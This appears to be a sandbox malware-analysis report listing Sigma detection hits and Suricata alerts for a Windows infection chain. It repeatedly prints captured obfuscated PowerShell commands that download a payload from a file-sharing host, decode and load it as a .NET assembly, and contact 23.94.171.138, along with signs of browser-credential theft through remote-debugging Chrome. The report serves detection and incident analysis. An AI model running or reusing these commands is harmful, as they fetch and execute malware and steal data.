[System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F,
Source: Process started, Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F,
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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'+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7628, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , ProcessId: 8028, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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'+[chAr]34+'))')))", CommandLine: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE, CommandLine|base64offset|contains: L, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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'+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7628, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE, ProcessId: 7772, ProcessName: powershell.exe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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'+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7628, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , ProcessId: 8028, ProcessName: wscript.exe
                    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ParentProcessId: 3276, ParentProcessName: CasPol.exe, ProcessCommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 7332, ProcessName: chrome.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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'+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7628, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline", ProcessId: 7900, ProcessName: csc.exe
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7628, TargetFilename: C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = 
b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F,
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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'+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7628, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , ProcessId: 8028, ProcessName: wscript.exe
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7628, TargetFilename: C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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'+[chAr]34+'))')))", CommandLine: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = 
b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F,
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7604, ProcessName: svchost.exe

                    Data Obfuscation

                    Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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'+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7628, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline", ProcessId: 7900, ProcessName: csc.exe

                    Stealing of Sensitive Information

                    Source: Registry Key set | Author: Joe Security | Data: Details: F3 E4 18 5A 10 18 60 73 71 CA 92 6C CF BA 0D C7 70 A9 83 0C BC 9C E3 09 15 6B C7 E9 29 02 5F 56 C7 9C 21 5C 15 31 4B ED 6F 4A E7 05 D3 DC 23 36 C1 98 FC B2 C8 8F 6B 35 7C D7 56 AF 23 69 76 CF EB CC D5 82 B6 E3 5C 13 63 80 FA DB 2F 66 9A 8C 9E C1 D5 47 29 87 2A 94 E4 D4 42 95 06 A5 A5 56 BB 67 A5 6F BE 87 C9 AF B9 7A 8F 51 DD 2F 2F CA 76 6A , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 3276, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-EC111K\exepath
                    Suricata IDS alerts

                    Timestamp                       | SID     | Severity | Classtype                                     | Source IP      | Source Port | Destination IP  | Destination Port | Protocol
                    2024-11-18T16:52:56.864013+0100 | 2020425 | 1        | Exploit Kit Activity Detected                 | 23.94.171.138  | 80          | 192.168.2.8     | 55648            | TCP
                    2024-11-18T16:52:56.864013+0100 | 2020424 | 1        | Exploit Kit Activity Detected                 | 23.94.171.138  | 80          | 192.168.2.8     | 55648            | TCP
